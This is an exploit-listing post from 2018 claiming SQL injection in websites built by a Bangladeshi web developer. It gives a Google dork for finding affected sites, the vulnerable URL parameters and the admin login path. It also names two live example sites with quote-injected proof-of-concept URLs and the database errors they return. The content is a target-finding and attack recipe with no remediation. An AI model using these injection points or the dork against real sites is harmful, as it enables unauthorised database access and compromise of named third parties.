#################################################################################################
# Exploit Title : Site Design & Developed by G4 Tech Solutions Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : g4techsolution.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Powered by : G4 Tech Solutions''
# Exploit :
/details.php?pid=[SQL Injection]
/news_events.php?page=1&did=[SQL Injection]
# Admin Control Panel Path => /login.php
#################################################################################################
# Example Site =>
msinternational.com.bd/details.php?pid=521%27 => [ Proof of Concept ] => archive.is/MYgm0
bubb.edu.bd/news_events.php?page=1&did=50%27
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ''521'' ORDER BY seq ASC' at line 1
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/bub89ku/public_html/news_events.php on line 131
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################